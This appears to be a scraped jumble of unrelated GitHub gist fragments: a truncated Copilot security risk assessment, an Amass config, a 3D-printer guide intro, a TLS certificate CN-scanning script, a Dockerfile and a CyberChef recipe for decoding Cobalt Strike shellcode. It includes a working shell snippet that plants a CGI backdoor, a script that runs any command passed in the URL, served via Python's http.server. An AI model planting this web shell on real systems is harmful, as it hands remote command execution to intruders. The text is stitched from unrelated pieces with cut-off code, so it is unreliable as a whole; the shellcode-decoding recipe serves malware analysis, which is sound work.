import requests
import random
import string
import sys
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
@0xabad1dea
0xabad1dea / copilot-risk-assessment.md
Last active September 11, 2023 10:21
Risk Assessment of GitHub Copilot

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

@MarkBaggett
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@Sebazzz
Sebazzz / Creality-CR-6-Unboxing-guide.md
Last active August 16, 2024 14:31
Creality CR-6 Unboxing & assembly guide

CR-6 post-unboxing checklist

With most of the CR-6 SE issues being due to bad wiring or loose/too tight screws I feel like it is time for a good post-unboxing checklist, to be walked through pre-assembly. Even though I do not have my unit shipped yet, I've seen enough issues and fixes that I can compile this post.

I initially posted this on the independent CR-6 community Facebook group but since not everyone wants to use Facebook (which I totally understand), I will repost it here. I mirrored most of the relevant content of Facebook to imgur.

If you have any feedback or anything that needs to be added, please let me know and I will amend this post!

Note: There are some known issues with this printer - please read the entire guide. (It is long, I know, but this is a necessary evil!)

Communities

for ip in $(cat 1000.txt); do echo "Scanning $ip..."; cn=$(timeout 2 python3 dumpCN.py "$ip"); echo "{\"ip\":\"$ip\", \"cn\":\"$cn\"}" | tee -a results.txt | jq; done
@hakluke
hakluke / dumpCN.py
Last active September 18, 2022 10:52
#!/usr/bin/python3
import ssl,sys,json
cert = ssl.get_server_certificate((sys.argv[1], 443)) #Retrieve SSL server certificate
cert = ssl.PEM_cert_to_DER_cert(cert) #Convert certificate to DER format
begin = cert.rfind(b'\x06\x03\x55\x04\x03') + 7 #Find the last occurrence of this byte string indicating the CN, add 7 bytes to startpoint to account for length of byte string and padding
end = begin + cert[begin - 1] #Set endpoint to startpoint + the length of the CN
jsondata = {"ip": sys.argv[1], "cn": cert[begin:end].decode('utf-8')}
print(json.dumps(jsondata))
@lanmaster53
lanmaster53 / Dockerfile
Last active March 20, 2023 13:36
Docker image for running Python 3 scripts in a throw-away environment.
FROM python:slim
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1
ENV TZ=America/New_York
RUN mkdir -p /src
WORKDIR /src
@0xtornado
0xtornado / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created April 30, 2020 14:11
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]